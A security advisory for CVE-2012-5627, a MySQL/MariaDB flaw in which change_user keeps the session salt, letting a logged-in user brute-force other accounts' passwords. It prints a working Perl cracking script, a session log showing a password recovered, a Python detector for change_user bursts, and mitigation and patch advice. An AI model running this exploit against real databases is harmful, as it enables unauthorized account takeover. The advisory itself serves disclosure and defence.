Release date: 2012-6 6
Updated on: 2012-12-09
Affected Systems:
Oracle MySQL
Oracle MariaDB
Description:
--------------------------------------------------------------------------------
Bugtraq id: 56837
CVE (CAN) ID: CVE-2012-5627
Oracle MySQL Server is a small relational database management system. MariaDB is a fork of MySQL that uses the Maria storage engine; it is a free, open-source database server.
MySQL/MariaDB has a security vulnerability in how it handles the per-session salt used for user password authentication. When a client tries to log on to MySQL, the server generates a salt value that is used for the whole session, and the salt is required for sending the password. If the password is wrong, the connection is closed. To try a new password the client must reconnect, and a new salt is generated; this mechanism effectively prevents brute-force cracking. However, an attacker who has logged on to the server with a non-privileged account can use the MySQL "change_user" command to try to switch to other accounts. During this process the salt value is not changed and the connection is not closed, which allows attackers to crack passwords quickly and bypass security restrictions.
<* Source: Kingcope (kingcope@gmx.net)
Link: http://www.openwall.com/lists/oss-security/2012/12/06/4
https://bugzilla.redhat.com/show_bug.cgi?id=883719
http://seclists.org/fulldisclosure/2012/Dec/58
http://seclists.org/oss-sec/2012/q4/424
https://mariadb.atlassian.net/browse/MDEV-3915
*>
Test method:
--------------------------------------------------------------------------------
Alert
The following procedures (methods) may be offensive and are intended only for security research and teaching. Use them at your own risk!
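use Net::MySQL;

$| = 1;   # unbuffered output

# Log on once with the non-privileged account; the session salt is fixed here.
my $mysql = Net::MySQL->new(
    hostname => '192.168.2.3',
    database => 'test',
    user     => "user",
    password => "secret",
    debug    => 0,
);

$crackuser = "crackme";

# Candidate passwords are read from standard input, one per line.
while (<STDIN>) {
    chomp;
    $currentpass = $_;
    # change_user payload: user name, NUL, length byte 0x14, scrambled password, NUL.
    $vv = join "\0",
        $crackuser,
        "\x14" .
        Net::MySQL::Password->scramble(
            $currentpass, $mysql->{salt}, $mysql->{client_capabilities}
        ) . "\0";
    # Command byte 0x11 is change_user; it is sent on the same connection and salt.
    if ($mysql->_execute_command("\x11", $vv) ne undef) {
        print "[*] Cracked! --> $currentpass\n";
        exit;
    }
}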
---
Example session:
C:\Users\kingcope\Desktop>C:\Users\kingcope\Desktop\john179\run\john --incremental --stdout=5 | perl mysqlcrack.pl
Warning: MaxLen = 8 is too large for the current hash type, reduced to 5
words: 16382  time: 0:00:00:02  w/s: 6262  current: citcH
words: 24573  time: 0:00:00:04  w/s: 4916  current: rap
words: 40956  time: 0:00:00:07  w/s: 5498  current: matc3
words: 49147  time: 0:00:00:09  w/s: 5030  current: 4429
words: 65530  time: 0:00:00:12  w/s: 5354  current: ch141
words: 73721  time: 0:00:00:14  w/s: 5021  current: v3n
words: 90104  time: 0:00:00:17  w/s: 5277  current: pun2
[*] Cracked! --> pass
words: 98295  time: 0:00:00:18  w/s: 5434  current: 43gs
Session aborted
Suggestion:
--------------------------------------------------------------------------------
Temporary solution:
If you cannot install or upgrade the patch immediately, NSFOCUS recommends that you take the following measures to reduce the threat:
* Configure firewall rules or ACLs to only allow trusted users to access MySQL/MariaDB
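Added example (not part of the original advisory and not MySQL/MariaDB code): because the issue shows up as many failed change_user attempts on one connection that is never closed, a monitoring job can flag that pattern from whatever audit or protocol events are available. The event tuple layout, the thresholds and the function name flag_change_user_bursts are assumptions made for this example; the sample events are constructed.

```python
from collections import defaultdict, deque

# Constructed sample events: (epoch_seconds, connection_id, command, target_user, succeeded).
# This tuple layout is an assumption for the example, not a MySQL log format.
SAMPLE_EVENTS = (
    [(100.0, 41, "connect", "user", True)]
    + [(100.5 + 0.2 * i, 41, "change_user", "crackme", False) for i in range(8)]
    + [(102.3, 41, "change_user", "crackme", True)]
    + [(200.0, 42, "connect", "pool", True),
       (201.0, 42, "change_user", "app_ro", True),
       (230.0, 42, "change_user", "app_rw", False),
       (260.0, 42, "change_user", "app_rw", True)]
)


def flag_change_user_bursts(events, max_failures=5, window_seconds=10.0):
    """Flag connections with more than max_failures failed change_user
    attempts inside any window_seconds span on the same connection.

    Returns {connection_id: {"peak": int, "users": set, "succeeded_as": str or None}}.
    """
    failures = defaultdict(deque)  # connection_id -> timestamps of recent failures
    findings = {}
    for ts, conn_id, command, user, ok in sorted(events, key=lambda e: e[0]):
        if command != "change_user":
            continue
        window = failures[conn_id]
        # Drop failures that have aged out of the sliding window.
        while window and ts - window[0] > window_seconds:
            window.popleft()
        if not ok:
            window.append(ts)
            if len(window) > max_failures:
                hit = findings.setdefault(
                    conn_id, {"peak": 0, "users": set(), "succeeded_as": None})
                hit["peak"] = max(hit["peak"], len(window))
                hit["users"].add(user)
        elif conn_id in findings and window:
            # A success right after a flagged burst suggests a guessed password.
            findings[conn_id]["succeeded_as"] = user
    return findings


if __name__ == "__main__":
    for conn_id, hit in flag_change_user_bursts(SAMPLE_EVENTS).items():
        print(conn_id, hit)
```

Connection 42 in the sample stands for a connection pool that switches accounts with an occasional failure; it stays below the threshold and is not flagged.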
Vendor patch:
Oracle
------
The vendor has released a patch to fix this security problem. Please download it from the vendor's homepage:
http://www.oracle.com/technetwork/topics/security/